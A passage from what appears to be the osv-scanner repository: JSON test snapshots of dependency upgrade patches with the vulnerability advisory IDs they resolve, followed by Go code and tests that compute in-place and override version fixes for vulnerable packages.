"org.apache.mina:mina-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.21", "OrigResolved": "2.0.7", "NewResolved": "2.0.21" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5h29-qq92-wj7f", "AffectedNodes": [ 167 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-jc7h-c423-mpjc", "AffectedNodes": [ 19 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.12.0", "OrigResolved": "1.10.0", "NewResolved": "1.12.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 21 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jetty:jetty-http" }, "Type": {}, "OrigRequire": "", "NewRequire": "12.0.12", "OrigResolved": "9.4.52.v20230823", "NewResolved": "12.0.12" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-qh8g-58pp-2wxh", "AffectedNodes": [ 141 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jetty:jetty-server" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.4.56.v20240826", "OrigResolved": "9.4.52.v20230823", "NewResolved": "9.4.56.v20240826" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g8m5-722r-8whq", "AffectedNodes": [ 243 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.glassfish.jersey.core:jersey-common" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.34", "OrigResolved": "2.30", "NewResolved": "2.34" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-c43q-5hpj-4crv", "AffectedNodes": [ 68 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xalan:xalan" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.7.3", "OrigResolved": "2.7.2", "NewResolved": "2.7.3" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-9339-86wc-4qgf", "AffectedNodes": [ 249 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" }, { "Pkg": { "System": 6, "Name": "org.apache.tomcat.embed:tomcat-embed-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.0.110", "OrigResolved": "8.5.46", "NewResolved": "9.0.110" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 126 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-codec" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.68.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.68.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.45.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.45.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-lang3" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.18.0", "OrigResolved": "3.12.0", "NewResolved": "3.18.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" }, { "Pkg": { "System": 6, "Name": "org.apache.tomcat.embed:tomcat-embed-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.0.106", "OrigResolved": "8.5.46", "NewResolved": "9.0.106" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 126 ] } ], "AddedVulns": [ { "ID": "GHSA-gqp3-2cvr-x8m3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-hgrr-935x-pq79", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-vfww-5hm6-hx2j", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-wmwf-9ccg-fff5", "AffectedNodes": [ 179 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 126 ] } ], "AddedVulns": [ { "ID": "GHSA-2rvv-w9r2-rg7m", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-3p2h-wqq4-wf4h", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-5j33-cvvr-w245", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-7w75-32cg-r6g2", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-83qj-6fr2-vhqg", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-9xcj-c8cr-8c3c", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-c9hw-wf7x-jp9j", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-f4qf-m5gf-8jm8", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-fccv-jmmp-qg76", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-ff77-26x5-69cr", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-g8pj-r55q-5c2v", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-h2fw-rfh5-95r3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-h3gc-qfqq-6h8f", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-hh3j-x4mc-g48r", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-j39c-c8hj-x4j3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-jgwr-3qm3-26f3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-p22x-g9px-3945", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-q3mw-pvr8-9ggc", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-qppj-fm5r-hxr3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-qxf4-chvg-4r8r", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-r6j3-px5g-cq3x", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-wc4r-xq3c-5cf3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-wm9w-rjj3-j356", "AffectedNodes": [ 179 ] } ] } ] --- [TestComputeOverridePatches/workaround-commons - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-beanutils:commons-beanutils" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.9.4", "OrigResolved": "20020520", "NewResolved": "1.9.4" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-6phf-73q6-gh87", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/workaround-maven-guava-android-to-android - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.0-android", "OrigResolved": "22.0-android", "NewResolved": "24.0-android" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "OSV-000-000", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/workaround-maven-guava-jre-to-jre - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.0-jre", "OrigResolved": "23.1-jre", "NewResolved": "24.0-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "OSV-000-000", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/workaround-maven-guava-none-to-jre - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.0-jre", "OrigResolved": "20.0", "NewResolved": "24.0-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "OSV-000-000", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeRelaxPatches/npm-santatracker - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^10.8.2", "OrigResolved": "5.2.0", "NewResolved": "10.8.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-f8q6-p94x-37v3", "AffectedNodes": [ 573 ] }, { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "@google-cloud/cloudbuild" }, "Type": {}, "OrigRequire": "^2.6.0", "NewRequire": "^4.8.1", "OrigResolved": "2.6.0", "NewResolved": "4.8.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7v5v-9h63-cj86", "AffectedNodes": [ 181 ] }, { "ID": "GHSA-h755-8qp9-cq85", "AffectedNodes": [ 192 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^9.2.2", "OrigResolved": "5.2.0", "NewResolved": "9.2.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-f8q6-p94x-37v3", "AffectedNodes": [ 573 ] }, { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [ { "ID": "GHSA-76p7-773f-r4q5", "AffectedNodes": [ 580 ] }, { "ID": "GHSA-mwcw-c2x4-8c55", "AffectedNodes": [ 579 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "@google-cloud/cloudbuild" }, "Type": {}, "OrigRequire": "^2.6.0", "NewRequire": "^3.10.0", "OrigResolved": "2.6.0", "NewResolved": "3.10.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7v5v-9h63-cj86", "AffectedNodes": [ 181 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "autoprefixer" }, "Type": {}, "OrigRequire": "^9.3.0", "NewRequire": "^10.4.21", "OrigResolved": "9.8.8", "NewResolved": "10.4.21" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7fh5-64p2-3v2j", "AffectedNodes": [ 316 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "dhost" }, "Type": {}, "OrigRequire": "^0.1.9", "NewRequire": "^0.3.5", "OrigResolved": "0.1.9", "NewResolved": "0.3.5" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3xgq-45jj-v275", "AffectedNodes": [ 358 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "firebase" }, "Type": {}, "OrigRequire": "^8.10.0", "NewRequire": "^11.10.0", "OrigResolved": "8.10.1", "NewResolved": "11.10.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3wf4-68gx-mph8", "AffectedNodes": [ 21 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "google-closure-library" }, "Type": {}, "OrigRequire": "^20190909.0.0", "NewRequire": "^20200315.0.0", "OrigResolved": "20190909.0.0", "NewResolved": "20200315.0.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-vh5w-fg69-rc8m", "AffectedNodes": [ 24 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "terser" }, "Type": {}, "OrigRequire": "^3.10.11", "NewRequire": "^4.8.1", "OrigResolved": "3.17.0", "NewResolved": "4.8.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-4wf5-vphf-c2xc", "AffectedNodes": [ 44 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "tmp" }, "Type": {}, "OrigRequire": "^0.0.33", "NewRequire": "^0.2.5", "OrigResolved": "0.0.33", "NewResolved": "0.2.5" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-52f5-9888-hmc6", "AffectedNodes": [ 45 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "yargs" }, "Type": {}, "OrigRequire": "^12.0.2", "NewRequire": "^13.3.2", "OrigResolved": "12.0.5", "NewResolved": "13.3.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-p9pc-299p-vxgp", "AffectedNodes": [ 601 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^6.2.3", "OrigResolved": "5.2.0", "NewResolved": "6.2.3" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [ { "ID": "GHSA-2j2x-2gpw-g8fm", "AffectedNodes": [ 690 ] }, { "ID": "GHSA-gxpj-cx7g-858c", "AffectedNodes": [ 568 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^8.4.0", "OrigResolved": "5.2.0", "NewResolved": "8.4.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [ { "ID": "GHSA-mwcw-c2x4-8c55", "AffectedNodes": [ 579 ] }, { "ID": "GHSA-qrpm-p2h7-hrv2", "AffectedNodes": [ 579 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "firebase" }, "Type": {}, "OrigRequire": "^8.10.0", "NewRequire": "^10.14.1", "OrigResolved": "8.10.1", "NewResolved": "10.14.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3wf4-68gx-mph8", "AffectedNodes": [ 21 ] } ], "AddedVulns": [ { "ID": "GHSA-c76h-2ccp-4975", "AffectedNodes": [ 409 ] }, { "ID": "GHSA-cxrh-j4jr-qwg3", "AffectedNodes": [ 409 ] } ] } ] --- ================================================ FILE: internal/remediation/in_place.go ================================================ // Package remediation provides logic for Guided Remediation. package remediation import ( "cmp" "context" "errors" "maps" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/clients/clientinterfaces" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" lf "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type InPlacePatch struct { lf.DependencyPatch ResolvedVulns []resolution.Vulnerability } type InPlaceResult struct { Patches []InPlacePatch Unfixable []resolution.Vulnerability } type VulnCount struct { Direct int Transitive int // Note: These are metrics that overlap with Direct/Transitive, and with each other. Unfixable int Dev int } func (vc VulnCount) Total() int { return vc.Direct + vc.Transitive } func (r InPlaceResult) VulnCount() VulnCount { devCount := 0 directCount := 0 transitiveCount := 0 for _, rv := range r.Unfixable { if rv.DevOnly { devCount++ } if rv.IsDirect() { directCount++ } else { transitiveCount++ } } // Key vulnerabilities by (ID, package name, package version) to be consistent with scan action's counting type vulnKey struct { id string vk resolve.VersionKey } uniqueVulns := make(map[vulnKey]struct { dev bool direct bool }) for _, p := range r.Patches { vk := resolve.VersionKey{PackageKey: p.Pkg, Version: p.OrigVersion} for _, rv := range p.ResolvedVulns { key := vulnKey{id: rv.OSV.GetId(), vk: vk} d, ok := uniqueVulns[key] if !ok { d.dev = rv.DevOnly d.direct = rv.IsDirect() } else { d.dev = d.dev && rv.DevOnly d.direct = d.direct || rv.IsDirect() } uniqueVulns[key] = d } } for _, d := range uniqueVulns { if d.dev { devCount++ } if d.direct { directCount++ } else { transitiveCount++ } } return VulnCount{ Unfixable: len(r.Unfixable), Dev: devCount, Direct: directCount, Transitive: transitiveCount, } } // ComputeInPlacePatches finds all possible targeting version changes that would fix vulnerabilities in a resolved graph. // TODO: Check for introduced vulnerabilities func ComputeInPlacePatches(ctx context.Context, cl client.ResolutionClient, graph *resolve.Graph, opts Options) (InPlaceResult, error) { res, err := inPlaceVulnsNodes(ctx, cl, graph) if err != nil { return InPlaceResult{}, err } // Compute the overall constraints imposed by the dependent packages on the vulnerable nodes vkDependentConstraint := make(map[resolve.VersionKey]semver.Set) for vk, vkVulns := range res.vkVulns { reqVers := make(map[string]struct{}) for _, vuln := range vkVulns { for _, sg := range vuln.Subgraphs { for _, e := range sg.Nodes[sg.Dependency].Parents { reqVers[e.Requirement] = struct{}{} } } } set, err := buildConstraintSet(vk.Semver(), slices.AppendSeq(make([]string, 0, len(reqVers)), maps.Keys(reqVers))) if err != nil { // TODO: log error? continue } vkDependentConstraint[vk] = set } var result InPlaceResult // TODO: This could be parallelized for vk, vulnList := range res.vkVulns { for _, vuln := range vulnList { if !opts.MatchVuln(vuln) { continue } // Consider vulns affecting packages we don't want to change unfixable if opts.UpgradeConfig.Get(vk.Name) == upgrade.None { result.Unfixable = append(result.Unfixable, vuln) continue } newVK, err := findFixedVersion(ctx, cl, vk.PackageKey, func(newVK resolve.VersionKey) bool { // Check if this is a disallowed version bump _, diff, err := vk.Semver().Difference(vk.Version, newVK.Version) if err != nil || !opts.UpgradeConfig.Get(vk.Name).Allows(diff) { return false } // Check if dependent packages are still satisfied by new version ok, err := vkDependentConstraint[vk].Match(newVK.Version) if err != nil || !ok { return false } // Check if new version's dependencies are satisfied by existing packages for _, nID := range res.vkNodes[vk] { ok, err := dependenciesSatisfied(ctx, cl, newVK, res.nodeDependencies[nID]) if err != nil || !ok { return false } } // Check if this version is vulnerable return !vulns.IsAffected(vuln.OSV, util.VKToPackageInfo(newVK)) }) if errors.Is(err, errInPlaceImpossible) { result.Unfixable = append(result.Unfixable, vuln) continue } else if err != nil { return InPlaceResult{}, err } dp := lf.DependencyPatch{ Pkg: vk.PackageKey, OrigVersion: vk.Version, NewVersion: newVK.Version, } idx := slices.IndexFunc(result.Patches, func(ipp InPlacePatch) bool { return ipp.DependencyPatch == dp }) if idx >= 0 { result.Patches[idx].ResolvedVulns = append(result.Patches[idx].ResolvedVulns, vuln) } else { result.Patches = append(result.Patches, InPlacePatch{ DependencyPatch: dp, ResolvedVulns: []resolution.Vulnerability{vuln}, }) } } } // Sort patches for priority/consistency slices.SortFunc(result.Patches, func(a, b InPlacePatch) int { // Number of vulns fixed descending if c := cmp.Compare(len(a.ResolvedVulns), len(b.ResolvedVulns)); c != 0 { return -c } // Package name ascending if c := cmp.Compare(a.Pkg.Name, b.Pkg.Name); c != 0 { return c } // Original version ascending if c := cmp.Compare(a.OrigVersion, b.OrigVersion); c != 0 { return c } // New version descending return -cmp.Compare(a.NewVersion, b.NewVersion) }) return result, nil } var errInPlaceImpossible = errors.New("cannot find a version satisfying in-place constraints") func findFixedVersion(ctx context.Context, cl client.DependencyClient, pk resolve.PackageKey, satifyFn func(resolve.VersionKey) bool) (resolve.VersionKey, error) { vers, err := cl.Versions(ctx, pk) if err != nil { return resolve.VersionKey{}, err } // Make sure versions are sorted, then iterate over versions from latest to earliest looking for a satisfying version slices.SortFunc(vers, func(a, b resolve.Version) int { return a.Semver().Compare(a.Version, b.Version) }) for i := len(vers) - 1; i >= 0; i-- { vk := vers[i].VersionKey if vk.VersionType == resolve.Concrete && satifyFn(vk) { return vk, nil } } return resolve.VersionKey{}, errInPlaceImpossible } type inPlaceVulnsNodesResult struct { nodeDependencies map[resolve.NodeID][]resolve.VersionKey vkVulns map[resolve.VersionKey][]resolution.Vulnerability vkNodes map[resolve.VersionKey][]resolve.NodeID } func inPlaceVulnsNodes(ctx context.Context, m clientinterfaces.VulnerabilityMatcher, graph *resolve.Graph) (inPlaceVulnsNodesResult, error) { nodeVulns, err := m.MatchVulnerabilities(ctx, client.GraphToInventory(graph)) if err != nil { return inPlaceVulnsNodesResult{}, err } // GraphToInventory/MatchVulnerabilities excludes the root node of the graph. // Prepend an element to nodeVulns so that the indices line up with graph.Nodes[i] <=> nodeVulns[i] nodeVulns = append([][]*osvschema.Vulnerability{nil}, nodeVulns...) result := inPlaceVulnsNodesResult{ nodeDependencies: make(map[resolve.NodeID][]resolve.VersionKey), vkVulns: make(map[resolve.VersionKey][]resolution.Vulnerability), vkNodes: make(map[resolve.VersionKey][]resolve.NodeID), } // Find all direct dependencies of vulnerable nodes. for _, e := range graph.Edges { if len(nodeVulns[e.From]) > 0 { result.nodeDependencies[e.From] = append(result.nodeDependencies[e.From], graph.Nodes[e.To].Version) } } // Construct resolution.Vulnerability for all vulnerable packages // combining nodes with the same package & versions number var nodeIDs []resolve.NodeID for nID, nVulns := range nodeVulns { if len(nVulns) > 0 { nodeIDs = append(nodeIDs, resolve.NodeID(nID)) } } nodeSubgraphs := resolution.ComputeSubgraphs(graph, nodeIDs) for i, nID := range nodeIDs { vk := graph.Nodes[nID].Version result.vkNodes[vk] = append(result.vkNodes[vk], nID) for _, vuln := range nodeVulns[nID] { resVuln := resolution.Vulnerability{ OSV: vuln, Subgraphs: []*resolution.DependencySubgraph{nodeSubgraphs[i]}, DevOnly: nodeSubgraphs[i].IsDevOnly(nil), } idx := slices.IndexFunc(result.vkVulns[vk], func(rv resolution.Vulnerability) bool { return rv.OSV.GetId() == resVuln.OSV.GetId() }) if idx >= 0 { result.vkVulns[vk][idx].DevOnly = result.vkVulns[vk][idx].DevOnly && resVuln.DevOnly result.vkVulns[vk][idx].Subgraphs = append(result.vkVulns[vk][idx].Subgraphs, resVuln.Subgraphs...) } else { result.vkVulns[vk] = append(result.vkVulns[vk], resVuln) } } } return result, nil } func buildConstraintSet(sys semver.System, requiredVers []string) (semver.Set, error) { // combine a list of requirement strings into one semver.Set to allow version matching v := requiredVers[0] // 'latest' is effectively meaningless in a lockfile, since what 'latest' is could have changed between locking // TODO: other tags e.g. "next", "old" (?) // TODO: non-npm ecosystems if v == "latest" { v = "*" } c, err := sys.ParseConstraint(v) if err != nil { return semver.Set{}, err } cSet := c.Set() for _, req := range requiredVers[1:] { if req == "latest" { req = "*" } c, err := sys.ParseConstraint(req) if err != nil { return semver.Set{}, err } if err := cSet.Intersect(c.Set()); err != nil { return semver.Set{}, err } } return cSet, nil } func dependenciesSatisfied(ctx context.Context, cl client.DependencyClient, vk resolve.VersionKey, children []resolve.VersionKey) (bool, error) { var deps []resolve.VersionKey var optDeps []resolve.VersionKey reqs, err := cl.Requirements(ctx, vk) if err != nil { return false, err } for _, v := range reqs { if v.Type.IsRegular() { deps = append(deps, v.VersionKey) } else if v.Type.HasAttr(dep.Opt) { optDeps = append(optDeps, v.VersionKey) } } // TODO: correctly handle other attrs e.g. npm peerDependencies // remove the optional deps from the regular deps (because they can show up in both) if they're not already installed for _, optVk := range optDeps { if !slices.ContainsFunc(children, func(vk resolve.VersionKey) bool { return vk.Name == optVk.Name }) { idx := slices.IndexFunc(deps, func(vk resolve.VersionKey) bool { return vk.Name == optVk.Name }) if idx >= 0 { deps = slices.Delete(deps, idx, idx+1) } } } for _, depVK := range deps { ver := depVK.Version // 'latest' is effectively meaningless in a lockfile, since what 'latest' is could have changed between locking // TODO: Support other tags e.g. "next", "old" & non-npm ecosystems if ver == "latest" { ver = "*" } constr, err := vk.Semver().ParseConstraint(ver) if err != nil { return false, err } // check if any of the current children satisfy this import ok := false for _, child := range children { if child.Name == depVK.Name && constr.Match(child.Version) { ok = true break } } if !ok { return false, nil } } return true, nil } ================================================ FILE: internal/remediation/in_place_test.go ================================================ package remediation_test import ( "cmp" "maps" "slices" "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/testutility" ) func parseInPlaceFixture(t *testing.T, universePath, vulnPath, lockfilePath string) (*resolve.Graph, client.ResolutionClient) { t.Helper() rw, err := lockfile.GetReadWriter(lockfilePath) if err != nil { t.Fatalf("Failed to get ReadWriter: %v", err) } f, err := depfile.OpenLocalDepFile(lockfilePath) if err != nil { t.Fatalf("Failed to open lockfile: %v", err) } defer f.Close() g, err := rw.Read(f) if err != nil { t.Fatalf("Failed to parse lockfile: %v", err) } return g, clienttest.NewMockResolutionClient(t, universePath, vulnPath) } func checkInPlaceResults(t *testing.T, res remediation.InPlaceResult) { // InPlaceResult is too large when dumped as JSON. // Extract & compare a subset of fields that are relevant for the tests. t.Helper() type minimalVuln struct { ID string AffectedNodes []resolve.NodeID } toMinimalVuln := func(v resolution.Vulnerability) minimalVuln { t.Helper() nodes := make(map[resolve.NodeID]struct{}) for _, sg := range v.Subgraphs { nodes[sg.Dependency] = struct{}{} } sortedNodes := slices.AppendSeq(make([]resolve.NodeID, 0, len(nodes)), maps.Keys(nodes)) slices.Sort(sortedNodes) return minimalVuln{ ID: v.OSV.GetId(), AffectedNodes: sortedNodes, } } type minimalPatch struct { Patch lockfile.DependencyPatch Resolved []minimalVuln } type minimalResult struct { Patches []minimalPatch Unfixable []minimalVuln } minimalRes := minimalResult{ Patches: make([]minimalPatch, len(res.Patches)), Unfixable: make([]minimalVuln, len(res.Unfixable)), } for i, p := range res.Patches { minimalRes.Patches[i].Patch = p.DependencyPatch resolved := make([]minimalVuln, len(p.ResolvedVulns)) for j, v := range p.ResolvedVulns { resolved[j] = toMinimalVuln(v) } minimalRes.Patches[i].Resolved = resolved } for i, v := range res.Unfixable { minimalRes.Unfixable[i] = toMinimalVuln(v) } // make sure the unfixable vulns are in a stable order slices.SortFunc(minimalRes.Unfixable, func(a, b minimalVuln) int { if c := cmp.Compare(a.ID, b.ID); c != 0 { return c } return slices.Compare(a.AffectedNodes, b.AffectedNodes) }) testutility.NewSnapshot().MatchJSON(t, minimalRes) } func TestComputeInPlacePatches(t *testing.T) { t.Parallel() basicOpts := remediation.Options{ DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } tests := []struct { name string universePath string vulnPath string lockfilePath string opts remediation.Options }{ { name: "npm-santatracker", universePath: "./testdata/santatracker/universe.yaml", vulnPath: "./testdata/santatracker/vulns.json", lockfilePath: "./testdata/santatracker/package-lock.json", opts: basicOpts, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() g, cl := parseInPlaceFixture(t, tt.universePath, tt.vulnPath, tt.lockfilePath) res, err := remediation.ComputeInPlacePatches(t.Context(), cl, g, tt.opts) if err != nil { t.Fatalf("Failed to compute in-place patches: %v", err) } checkInPlaceResults(t, res) }) } } ================================================ FILE: internal/remediation/override.go ================================================ package remediation import ( "context" "errors" "fmt" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/utility/maven" "github.com/google/osv-scanner/v2/internal/utility/vulns" ) type overridePatch struct { resolve.PackageKey OrigVersion string NewVersion string } // ComputeOverridePatches attempts to resolve each vulnerability found in result independently, returning the list of unique possible patches. // Vulnerabilities are resolved by directly overriding versions of vulnerable packages to non-vulnerable versions. // If a patch introduces new vulnerabilities, additional overrides are attempted for the new vulnerabilities. func ComputeOverridePatches(ctx context.Context, cl client.ResolutionClient, result *resolution.Result, opts Options) ([]resolution.Difference, error) { // TODO: this is very similar to ComputeRelaxPatches - can the common parts be factored out? // Filter the original result just in case it hasn't 